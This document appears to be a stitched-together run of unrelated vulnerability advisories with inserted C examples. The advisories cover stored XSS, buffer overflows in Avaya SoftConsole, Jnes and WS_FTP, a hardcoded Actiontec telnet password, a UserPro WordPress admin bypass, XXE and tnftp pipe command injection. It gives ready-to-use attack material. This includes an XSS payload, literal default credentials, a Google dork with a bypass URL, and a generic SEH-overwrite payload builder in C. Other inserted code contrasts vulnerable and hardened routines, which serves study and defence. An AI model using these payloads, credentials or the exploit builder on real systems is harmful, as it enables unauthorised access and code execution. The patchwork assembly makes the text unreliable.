Log in, go to the favorites tab and add a new favorite, supplying a script as the value of the field. Payload: <script>alert(1)</script>. The script is saved and produces a pop-up for the user every time they open that page. This is therefore a persistent (stored) XSS.
SoftConsole.exe does not check bounds when reading the server response after making an outbound connection, resulting in a classic buffer overflow. An Avaya IP Office user must connect to a malicious server, which can then deliver the overflow payload in its response and exploit the SoftConsole client. The vulnerability allows a remote attacker to deliver and execute arbitrary attacker-supplied code on the Avaya host system.
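The bug class above, as an added example that is not Avaya or SoftConsole code: a client copies a server response into a fixed-size buffer using the length the server declares, beside a bounded version of the same read. The wire format (a 2-byte big-endian length followed by the payload) and the 64-byte buffer are assumptions for illustration.

```c
/* Added example, not SoftConsole code: trusting a server-declared length
 * versus checking it against both the bytes received and the buffer. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RESP_MAX 64   /* client-side buffer size (assumed) */

struct response {
    char data[RESP_MAX];
    size_t len;
};

/* Vulnerable pattern: the declared length is used as the copy size without
 * comparing it to sizeof(out->data).  A server declaring 0xFFFF and sending
 * that many bytes writes far past `out` on the stack.  Kept only to show
 * the bug; never call it on untrusted input. */
int read_response_unchecked(const uint8_t *wire, size_t wire_len,
                            struct response *out)
{
    if (wire_len < 2)
        return -1;
    size_t declared = ((size_t)wire[0] << 8) | wire[1];
    memcpy(out->data, wire + 2, declared);   /* no bound: overflow */
    out->len = declared;
    return 0;
}

/* Hardened: the declared length must fit both the bytes actually received
 * and the destination buffer before a single byte is copied. */
int read_response_checked(const uint8_t *wire, size_t wire_len,
                          struct response *out)
{
    if (wire_len < 2)
        return -1;                      /* truncated header */
    size_t declared = ((size_t)wire[0] << 8) | wire[1];
    if (declared > wire_len - 2)
        return -2;                      /* claims more than was received */
    if (declared >= sizeof out->data)
        return -3;                      /* would not fit (room kept for NUL) */
    memcpy(out->data, wire + 2, declared);
    out->data[declared] = '\0';
    out->len = declared;
    return 0;
}

int main(void)
{
    /* Constructed responses: one honest, one that would overflow. */
    uint8_t good[] = { 0x00, 0x05, 'h', 'e', 'l', 'l', 'o' };
    uint8_t big[2 + 256];
    struct response r;

    big[0] = 0x01; big[1] = 0x00;            /* declares 256 bytes */
    memset(big + 2, 'A', 256);

    printf("good -> %d (%s)\n", read_response_checked(good, sizeof good, &r), r.data);
    printf("big  -> %d\n", read_response_checked(big, sizeof big, &r));
    return 0;
}
```

The two rejections differ on purpose: a length larger than the bytes in hand is a protocol error (or a read past the receive buffer), while a length larger than the destination is the overflow the advisory describes; a client that logs them separately makes a malicious server easy to spot.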
The Debut embedded HTTP server contains a remotely exploitable denial of service: a single malformed HTTP POST request causes the server to hang until it eventually replies with an HTTP 500 error. While the server is hung, print jobs over the network are blocked and the web interface is inaccessible. An attacker can send this malformed request continuously to keep the device unavailable to legitimate traffic.
The Actiontec C1000A modem provided by CenturyLink has hardcoded passwords. This is similar to another recent submission by Matthew Shiemo, who inspired me to check the device I use. Proof of Concept: telnet to 192.168.0.1 and log in with admin/CenturyL1nk.
The UserPro WordPress plugin allows login authentication to be bypassed for the user 'admin'. Sites that do not use the default username 'admin' are not affected.
PoC:
1 - Google dork: inurl:/plugins/userpro
2 - Browse to a site that has the userpro plugin installed.
3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true
4 - If the site has a default 'admin' user, you will now see the WordPress menu at the top of the site. You are now logged in with full administrator access.
Jnes version 1.0.2 is vulnerable to a stack-based buffer overflow. An attacker can trigger it by loading a malicious ROM file, then opening Options > Cheats > Add > Pro-Action Replay, pasting the contents of open.txt into the <address>-<value> box and clicking OK. This overflows the buffer and allows the attacker to execute arbitrary code on the vulnerable system.
A buffer overflow vulnerability exists in Ipswitch WS_FTP Professional version 12.6.03. An attacker can exploit it by entering a specially crafted payload in the search field, which overwrites the SEH handler and leads to arbitrary code execution. The PoC generates the payload with a script, using a run of 'D' bytes as a placeholder for the shellcode, and the result is pasted into the search field.
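The SEH-overwrite layout such a generator produces, as an added example that is not the WS_FTP PoC script: junk up to the nSEH slot, a short jump in nSEH, a pop/pop/ret address in the SEH slot, then the shellcode (or the 'D' placeholder the advisory mentions). The offset, the gadget address and the bad-character list are hypothetical placeholders; real values come from crashing the target under a debugger.

```c
/* Added example, not the WS_FTP PoC: generic SEH-overwrite payload builder.
 * Layout: [junk to nSEH][nSEH: jmp short +6][SEH: pop/pop/ret][shellcode] */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Returns bytes written, or 0 if `out` is too small or the gadget address
 * contains a byte from `badchars` (which the target would mangle). */
size_t build_seh_payload(uint8_t *out, size_t cap,
                         size_t nseh_offset, uint32_t ppr_addr,
                         const uint8_t *shellcode, size_t sc_len,
                         const uint8_t *badchars, size_t bad_len)
{
    /* jmp short +6 skips the 4-byte SEH address that follows nSEH;
     * the two NOPs pad nSEH to the full 4-byte slot. */
    static const uint8_t nseh[4] = { 0xEB, 0x06, 0x90, 0x90 };
    uint8_t seh[4];
    size_t total = nseh_offset + sizeof nseh + sizeof seh + sc_len;
    size_t i, j;

    if (total > cap)
        return 0;
    for (i = 0; i < 4; i++)                 /* little-endian dword */
        seh[i] = (uint8_t)(ppr_addr >> (8 * i));
    for (i = 0; i < 4; i++)                 /* reject bad chars in the address */
        for (j = 0; j < bad_len; j++)
            if (seh[i] == badchars[j])
                return 0;

    memset(out, 'A', nseh_offset);
    memcpy(out + nseh_offset, nseh, sizeof nseh);
    memcpy(out + nseh_offset + 4, seh, sizeof seh);
    memcpy(out + nseh_offset + 8, shellcode, sc_len);
    return total;
}

int main(void)
{
    uint8_t buf[4096];
    uint8_t placeholder[400];               /* 'D's stand in for shellcode, as in the advisory */
    static const uint8_t bad[] = { 0x00, 0x0A, 0x0D };   /* hypothetical bad chars */
    size_t n;

    memset(placeholder, 'D', sizeof placeholder);
    n = build_seh_payload(buf, sizeof buf,
                          1000,               /* hypothetical nSEH offset */
                          0x10203040,         /* hypothetical pop/pop/ret */
                          placeholder, sizeof placeholder, bad, sizeof bad);
    if (n == 0) {
        fputs("payload rejected (size or bad chars)\n", stderr);
        return 1;
    }
    fwrite(buf, 1, n, stdout);              /* redirect to a file for pasting */
    return 0;
}
```

Keeping the bad-character check in the builder is the point of writing it as a function: a pop/pop/ret gadget whose address contains a NUL or newline is silently truncated by a text field, which is the usual reason a layout that looks right in the debugger never reaches the handler.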
Attackers who can send SOAP messages to a Ladon web service via its HTTP interface can exploit an XML external entity (XXE) vulnerability to read local files, forge server-side requests, or exhaust the service's memory with exponentially expanding entity payloads.
This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename (called "savefile" in the source) for a requested resource. If tnftp is run without the -o command-line option, it derives the output filename from the last component of the requested resource. If that filename begins with a "|" character, tnftp passes the fetched resource to the command following the "|" through popen().
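The savefile logic the module describes, reduced to its essentials as an added example (this is not tnftp source, and the function names are this example's own): the last path component becomes the output name, a leading "|" hands it to popen(), and a hardened open refuses anything that is not a plain file name. The real client also URL-decodes the component; that step is omitted here.

```c
/* Added example, not tnftp code: output-filename resolution, the popen()
 * pattern that turns it into command execution, and a safe alternative. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Last path component of the requested resource, as used when no -o is
 * given.  (tnftp additionally URL-decodes it; omitted here.) */
const char *resolve_savefile(const char *url)
{
    const char *slash = strrchr(url, '/');
    return slash ? slash + 1 : url;
}

/* Vulnerable pattern: a leading '|' turns the save target into a shell
 * command, so a resource named "|id" runs `id` on the client.  Shown for
 * contrast only; never call it with an attacker-influenced name. */
FILE *open_savefile_unsafe(const char *savefile)
{
    if (savefile[0] == '|')
        return popen(savefile + 1, "w");   /* arbitrary command execution */
    return fopen(savefile, "w");
}

/* Returns 1 if `savefile` is acceptable as a plain file name in the
 * current directory: non-empty, not a '|' command spec, no path
 * separators, and not "." or "..". */
int savefile_is_safe(const char *savefile)
{
    if (savefile == NULL || savefile[0] == '\0')
        return 0;
    if (savefile[0] == '|')
        return 0;
    if (strchr(savefile, '/') != NULL)
        return 0;
    if (strcmp(savefile, ".") == 0 || strcmp(savefile, "..") == 0)
        return 0;
    return 1;
}

/* Hardened: the name is never interpreted; anything that is not a plain
 * file name is refused, and the open goes through fopen() only. */
FILE *open_savefile_safe(const char *savefile)
{
    if (!savefile_is_safe(savefile))
        return NULL;
    return fopen(savefile, "w");
}

int main(void)
{
    /* Constructed URLs: a normal download and a "|"-prefixed last component. */
    const char *urls[] = {
        "http://example.com/files/report.txt",
        "http://example.com/files/|uname -a",
    };
    for (size_t i = 0; i < 2; i++) {
        const char *name = resolve_savefile(urls[i]);
        printf("%-40s -> savefile \"%s\" %s\n", urls[i], name,
               savefile_is_safe(name) ? "accepted" : "REFUSED");
    }
    return 0;
}
```

The check rejects the name rather than stripping the "|": quietly rewriting attacker-chosen input tends to produce a second bug, and a client that refuses to write the file at all fails closed.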
This exploit gains remote code execution on Oracle PeopleSoft systems. It uses XXE to upload a malicious payload to the target, which is then used to execute arbitrary commands on the target system.